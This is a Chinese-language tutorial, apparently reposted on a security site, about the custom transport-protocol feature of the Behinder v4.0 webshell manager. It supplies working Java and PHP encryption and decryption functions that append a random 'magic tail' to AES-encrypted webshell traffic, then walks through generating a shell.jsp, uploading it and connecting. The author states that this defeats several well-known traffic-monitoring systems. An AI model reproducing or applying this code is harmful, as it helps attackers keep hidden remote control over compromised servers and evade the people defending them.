冰蝎v4.0传输协议详解

admin
admin
admin
102359
文章
87
评论
2023年5月11日02:04:03冰蝎v4.0传输协议详解已关闭评论179 views2字数 6544阅读21分48秒阅读模式
  • 前言
  • 传输协议
  • 工作流程
  • 实例演示
    • 本地
    • 远程
    • 本地
    • 远程
    • 加密算法
    • 解密算法
  • 即时验证
    • 本地验证
    • 远程验证
  • 生成服务端
  • 分享和导入
  • 总结

前言

冰蝎v4.0相对于3.0版本,更新了较多内容,其中包括了开放了传输协议的自定义功能,本文将基于Behinder v4.0.4对自定义传输协议模块进行简单的介绍。

传输协议

在流量层,冰蝎的aes特征一直是厂商查杀的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,v4.0版本提供了传输协议自定义功能,让用户对流量的加密和解密进行自定义,实现流量加解密协议的去中心化。v4.0版本不再有连接密码的概念,你的自定义传输协议的算法就是连接密码。

工作流程

首先看一下冰蝎Payload流转的流程图:

图片

图 1
  1. 本地对Payload进行加密,然后通过POST请求发送给远程服务端;
  2. 服务端收到Payload密文后,利用解密算法进行解密;
  3. 服务端执行解密后的Payload,并获取执行结果;
  4. 服务端对Payload执行结果进行加密,然后返回给本地客户端;
  5. 客户端收到响应密文后,利用解密算法解密,得到响应内容明文。

由上述流程可知,一个完整的传输协议由两部分组成,本地协议和远程协议。由于客户端使用Java开发,因此本地协议的加解密算法需要用Java实现。远程协议根据服务端语言类型,可能为Java、PHP、C#、ASP。无论用哪种语言,同一个名称的传输协议,本地和远程的加解密逻辑应该是一致的,这样才能实现本地加密后,远程可以成功解密,远程加密后,本地同样也可以解密(因此如果修改默认的aes协议的key,则需要同时修改本地和远程的加密函数和加密函数中的key)。

一个传输协议必须包含一对本地加解密函数,至少包含一对远程加解密函数(Java、PHP、C#、ASP中的一个或者多个)。

由于本地是Java,因此本地加解密函数会默认作为远程Java版本的加解密函数。

如下是一个最简单的php版本的传输协议:

图片

图 2

传输协议的加解密函数名称分别为Encrypt和Decrypt,且都只有一个入参,参数类型为二进制字节流。在函加密数体内可以对字节流做任何加密,比如aes、rsa或者各种封装、拼接、自定义算法等等,最终将加密结果返回。在解密函数中利用对称算法将加密函数的结果进行解密,并将解密结果返回。为了能清晰展示传输协议的结构,上图中的传输协议其实未做任何加解密处理,直接将入参返回,是一个纯明文的传输协议。

实例演示

简单的demo介绍完了,下面来一个真实有用的例子。假设如下场景:服务端是PHP,使用默认的aes算法,但是由于默认使用的是aes128的算法,会导致密文长度恒是16的整数倍,流量设备可能通过这个特征来对冰蝎做流量识别,我现在想对默认算法做一个简单修改,在密文最后最加一个magic尾巴,随机产生一个随机长度的额外字节数组,实现如下:

private byte[] getMagic() throws Exception {
	String key="e45e329feb5d925b";
	int magicNum=Integer.parseInt(key.substring(0,2),16)%16;
	Random random=new Random();
	byte[] buf=new byte[magicNum];
	for (int i=0;i<buf.length;i++)
	{
		buf[i]=(byte)random.nextInt(256);
	}
	return buf;
}

然后我们把这段代码加入到我们的传输协议里面。

加密算法

本地

本地默认的aes传输协议加密算法如下:

private byte[] Encrypt(byte[] data) throws Exception
{
    String key="e45e329feb5d925b";
    byte[] raw = key.getBytes("utf-8");
    javax.crypto.spec.SecretKeySpec skeySpec = new javax.crypto.spec.SecretKeySpec(raw, "AES");
    javax.crypto.Cipher cipher =javax.crypto.Cipher.getInstance("AES/ECB/PKCS5Padding");// "算法/模式/补码方式"
    cipher.init(javax.crypto.Cipher.ENCRYPT_MODE, skeySpec);
    byte[] encrypted = cipher.doFinal(data);
    Class baseCls;
    try
    {
        baseCls=Class.forName("java.util.Base64");
        Object Encoder=baseCls.getMethod("getEncoder", null).invoke(baseCls, null);
        encrypted= (byte[]) Encoder.getClass().getMethod("encode", new Class[]{byte[].class}).invoke(Encoder, new Object[]{encrypted});
    }
    catch (Throwable error)
    {
        baseCls=Class.forName("sun.misc.BASE64Encoder");
        Object Encoder=baseCls.newInstance();
        String result=(String) Encoder.getClass().getMethod("encode",new Class[]{byte[].class}).invoke(Encoder, new Object[]{encrypted});
        result=result.replace("\n", "").replace("\r", "");
        encrypted=result.getBytes();
    }
    return encrypted;
}

修改后:

private byte[] Encrypt(byte[] data) throws Exception
{
    String key="e45e329feb5d925b";
    byte[] raw = key.getBytes("utf-8");
    javax.crypto.spec.SecretKeySpec skeySpec = new javax.crypto.spec.SecretKeySpec(raw, "AES");
    javax.crypto.Cipher cipher =javax.crypto.Cipher.getInstance("AES/ECB/PKCS5Padding");// "算法/模式/补码方式"
    cipher.init(javax.crypto.Cipher.ENCRYPT_MODE, skeySpec);
    byte[] encrypted = cipher.doFinal(data);
    Class baseCls;
    try
    {
        baseCls=Class.forName("java.util.Base64");
        Object Encoder=baseCls.getMethod("getEncoder", null).invoke(baseCls, null);
        encrypted= (byte[]) Encoder.getClass().getMethod("encode", new Class[]{byte[].class}).invoke(Encoder, new Object[]{encrypted});
    }
    catch (Throwable error)
    {
        baseCls=Class.forName("sun.misc.BASE64Encoder");
        Object Encoder=baseCls.newInstance();
        String result=(String) Encoder.getClass().getMethod("encode",new Class[]{byte[].class}).invoke(Encoder, new Object[]{encrypted});
        result=result.replace("\n", "").replace("\r", "");
        encrypted=result.getBytes();
    }
    //增加魔法尾巴
    int magicNum=Integer.parseInt(key.substring(0,2),16)%16;
    java.util.Random random=new java.util.Random();
    byte[] buf=new byte[magicNum];
    for (int i=0;i<buf.length;i++)
    {
        buf[i]=(byte)random.nextInt(256);
    }
    java.io.ByteArrayOutputStream output = new java.io.ByteArrayOutputStream();
    output.write(encrypted);
    output.write(buf);
    return output.toByteArray();
}

远程

由于我们目前假设的是一个PHP的目标环境,远程加密函数采用PHP格式编写,如下:

function Encrypt($data)
{
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
    $encrypted=base64_encode(openssl_encrypt($data, "AES-128-ECB", $key,OPENSSL_PKCS1_PADDING));
    $magicNum=hexdec(substr($key,0,2))%16; //根据密钥动态确定魔法尾巴的长度
    for($i=0;$i<$magicNum;$i++)
    {
        $encrypted=$encrypted.chr(mt_rand(0, 255)); //拼接魔法尾巴
    }
    return $encrypted;
}

解密算法

在加密算法中,我们在原版aes的基础上,在密文最后追加了一段魔法尾巴,尾巴长度为秘钥的前两位十六进制对应的数值对16取模的值。在解密时,我们只需要在原版aes解密函数的基础上,把密文最后的尾巴截掉即可。分别对Java版本和PHP版本的解密函数做修改。

本地

private byte[] Decrypt(byte[] data) throws Exception
{
    String k="e45e329feb5d925b";
    int magicNum=Integer.parseInt(k.substring(0,2),16)%16; //取magic tail长度
    data=java.util.Arrays.copyOfRange(data,0,data.length-magicNum); //截掉magic tail
    javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES/ECB/PKCS5Padding");c.init(2,new javax.crypto.spec.SecretKeySpec(k.getBytes(),"AES"));
    byte[] decodebs;
    Class baseCls ;
            try{
                baseCls=Class.forName("java.util.Base64");
                Object Decoder=baseCls.getMethod("getDecoder", null).invoke(baseCls, null);
                decodebs=(byte[]) Decoder.getClass().getMethod("decode", new Class[]{byte[].class}).invoke(Decoder, new Object[]{data});
            }
            catch (Throwable e)
            {
                baseCls = Class.forName("sun.misc.BASE64Decoder");
                Object Decoder=baseCls.newInstance();
                decodebs=(byte[]) Decoder.getClass().getMethod("decodeBuffer",new Class[]{String.class}).invoke(Decoder, new Object[]{new String(data)});

            }
    return c.doFinal(decodebs);
}

远程

对应的php版本如下:

function Decrypt($data)
{
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
    $magicNum=hexdec(substr($key,0,2))%16; //取magic tail长度
    $data=substr($data,0,strlen($data)-$magicNum); //截掉magic tail
    return openssl_decrypt(base64_decode($data), "AES-128-ECB", $key,OPENSSL_PKCS1_PADDING);
}

把本地加解密函数输入到本地Tab里面,如下:

图片

图 3

单击“保存”后,冰蝎会对加解密函数对进行一致性校验,校验通过提示保存成功,校验失败会弹框提示,确认后仍可继续保存。

把远程加解密函数输入到远程Tab里面,如下:

图片

图 4

即时验证

为了方便加解密一致性校验,冰蝎提供了即时加解密验证功能,输入加解密函数以后,可直接在窗口下方进行验证。

本地验证

在第一个文本框随意输入一段明文,点击加密,冰蝎后台会对当前加密函数进行动态编译并执行,然后将加密结果显示在第二个文本框,如下图:

图片

图 5

同样地,点击解密,冰蝎后台会对当前解密函数进行动态编译并执行,将第二个文本框中的密文解密,然后将解密结果显示在第二个文本框,如下图:

图片

图 6

提示:为了对服务端可能存在的老版本Java保持更好的兼容性,建议在开发时不要使用太新的语法,如lamda表达式等。

远程验证

因为本地的加解密是用Java语言编写,因此可以使用本机的Java环境进行动态编译、执行、验证。而远程的加解密函数可能是C#或者PHP等语言开发的,是不是就不好即时验证了呢?当然不是,记得我们的客户端有个Eval自定义码执行的功能,此处我们可以复用该模块进行加解密函数验证。

比如我要验证PHP版本的加解密函数,只要先在shell列表中添加一个可成功连接的php shell,然后验证的时候选择该shell即可。冰蝎会在后端连接该shell,并将加解密代码以自定义代码的形式发送至远程服务器进行执行、验证,如下图:

图片

图 7

如果输入的明文与经过加密再解密后,得到的内容一致,那说明该传输协议的加解密是一致的。

到此,aes_with_magic这个传输协议的Java版本和PHP版本就开发完毕了。

生成服务端

可以注意到,冰蝎v4.0版本没有再附带server端代码,因为加解密函数是不固定的,因此服务端也是动态生成的。首先在“协议名称”中选中我们的服务端需要使用的传输协议,点击“生成服务端”,即可生成,如下:

图片

图 8

将shell.jsp上传至服务器,然后新增shell,传输协议选择aes_with_magic,如下:

图片

图 9

连接成功:

图片

图 10

抓包可以看到请求和响应体中,都在密文最后增加了一个尾巴,如下:

图片

图 11

图片

图 12

这几个字节的尾巴有什么用呢?实际上,这几个字节的尾巴,可以绕过几大知名流量监测系统:)

分享和导入

如果你开发了一个私有的加解密算法后,并且他也可以很好的绕过流量监测,那你可以通过“分享”按钮将传输协议分享给你的团队,提高工作效率。

总结

以上通过一个实例对冰蝎v4.0的自定义传输协议功能做了一个简略的介绍,你可以自己发挥无限想象,来开发自己的私有传输协议,比如封装成图片、JSON、文档、HTML、XML等等。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月11日02:04:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   冰蝎v4.0传输协议详解https://cn-sec.com/archives/1724436.html